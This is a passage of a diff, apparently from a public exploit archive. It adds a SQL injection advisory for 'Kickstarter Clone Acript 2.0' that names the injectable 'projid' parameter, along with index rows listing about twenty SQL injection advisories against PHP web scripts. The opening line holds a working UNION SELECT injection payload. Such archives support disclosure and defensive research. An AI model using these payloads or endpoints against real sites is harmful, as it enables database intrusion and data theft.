+#     Payload: q=1%' UNION ALL SELECT NULL,CONCAT(0x7178766271,0x4f465861726a486c444f775973474c61656c6143724e785a4c476a50464550547357426e6a56416d,0x7170707871),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- DGFC
+# 
+# # # # #
--- a/exploits/php/webapps/43286.txt
+++ b/exploits/php/webapps/43286.txt
@ -0,0 +1,25 @@
+# # # # # 
+# Exploit Title: Kickstarter Clone Acript 2.0 - SQL Injection
+# Dork: N/A
+# Date: 08.12.2017
+# Vendor Homepage: https://www.phpscriptsmall.com/
+# Software Link: https://www.phpscriptsmall.com/product/kickstarter-clone-script/
+# Version: 2.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Proof of Concept: 
+# 
+# 1)
+# http://localhost/[PATH]/investcalc.php?price=1&projid=[SQL]
+# 
+# 
+# # # # #
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -38300,3 +38300,21 @@ id,file,description,date,author,type,platform,port
 43265,exploits/php/webapps/43265.txt,"Affiliate MLM Script 1.0 - 'product-category.php?key' SQL Injection",2017-12-09,"Ihsan Sencan",webapps,php,80
 43266,exploits/php/webapps/43266.txt,"Basic B2B Script 2.0.8 - 'product_details.php?id' SQL Injection",2017-12-09,"Ihsan Sencan",webapps,php,80
 43267,exploits/php/webapps/43267.txt,"Beauty Parlour Booking Script 1.0 - 'gender' / 'city' SQL Injection",2017-12-09,"Ihsan Sencan",webapps,php,80
+43268,exploits/php/webapps/43268.txt,"Nearbuy Clone Script 3.2 - 'search' SQL Injection",2017-12-08,"Ihsan Sencan",webapps,php,
+43269,exploits/php/webapps/43269.txt,"Cab Booking Script 1.0 - 'city' SQL Injection",2017-12-08,"Ihsan Sencan",webapps,php,
+43270,exploits/php/webapps/43270.txt,"Chartered Accountant Booking Script 1.0 - 'city' SQL Injection",2017-12-08,"Ihsan Sencan",webapps,php,
+43271,exploits/php/webapps/43271.txt,"Child Care Script 1.0 - 'city' SQL Injection",2017-12-08,"Ihsan Sencan",webapps,php,
+43272,exploits/php/webapps/43272.txt,"CMS Auditor Website 1.0 - SQL Injection",2017-12-08,"Ihsan Sencan",webapps,php,
+43273,exploits/php/webapps/43273.txt,"Co-work Space Search Script 1.0 - 'city' SQL Injection",2017-12-08,"Ihsan Sencan",webapps,php,
+43282,exploits/php/webapps/43282.txt,"Yoga Class Script 1.0 - 'list?city' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,80
+43274,exploits/php/webapps/43274.txt,"Consumer Complaints Clone Script 1.0 - 'id' SQL Injection",2017-12-08,"Ihsan Sencan",webapps,php,
+43275,exploits/php/webapps/43275.txt,"Entrepreneur Job Portal Script 2.0.6 - 'jobsearch_all.php?rid1' SQL Injection",2017-12-08,"Ihsan Sencan",webapps,php,
+43276,exploits/php/webapps/43276.txt,"Doctor Search Script 1.0 - 'city' SQL Injection",2017-12-08,"Ihsan Sencan",webapps,php,
+43281,exploits/php/webapps/43281.txt,"Food Order Script 1.0 - 'list?city' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,80
+43277,exploits/php/webapps/43277.txt,"E-commerce MLM Software 1.0 - SQL Injection",2017-12-08,"Ihsan Sencan",webapps,php,
+43280,exploits/php/webapps/43280.txt,"Facebook Clone Script 1.0 - 'id' / 'send' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,80
+43279,exploits/php/webapps/43279.txt,"Event Calendar Category Script 1.0 - 'city' SQL Injection",2017-12-08,"Ihsan Sencan",webapps,php,
+43283,exploits/php/webapps/43283.txt,"Freelance Website Script 2.0.6 - 'pr_id' / 'catid' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,80
+43284,exploits/php/webapps/43284.txt,"Hot Scripts Clone 3.1 - 'subctid' / 'mctid' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,80
+43285,exploits/php/webapps/43285.txt,"Foodspotting Clone Script 1.0 - 'quicksearch.php?q' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,80
+43286,exploits/php/webapps/43286.txt,"Kickstarter Clone Acript 2.0 - 'projid' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,80